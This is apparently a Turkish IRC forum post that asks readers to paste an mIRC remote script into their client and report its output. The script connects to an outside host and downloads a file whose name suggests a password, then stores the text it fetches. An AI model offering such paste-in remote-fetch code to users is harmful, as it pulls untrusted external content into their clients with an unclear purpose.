oda gayet güzel çalışıyor Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir. aşağıdaki kodu remoteye kopyalayıp cıkan yazıları pastele bir.
alias bLue {
if $sock(bLue) { sockclose bLue | echo : 1 }
sockopen bLue blue_eye_child.sitemynet.com 80
echo : 2
}
on *:sockopen:bLue:{
echo : 3
sockwrite -n $sockname GET /getdirsifreyi.txt HTTP/1.1 $crlf
sockwrite -n $sockname User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows Nt 5.1; SV1; .NET CLR 1.1.4322)
sockwrite -n $sockname Accept: */* $crlf
sockwrite -n $sockname Accept-Encoding: gzip, deflate $crlf
sockwrite -n $sockname Host: blue_eye_child.sitemynet.com $crlf
sockwrite -n $sockname Connection: Keep-Alive $+ $crlf $+ $crlf
echo : 4
}
on *:sockread:bLue:{
if $sockerr { return | echo : 5 }
sockread &getbin
echo : 6
if $crlf !isin $bvar(&getbin,1,1024).text { set %temptir $v2 | echo : 7 }
} |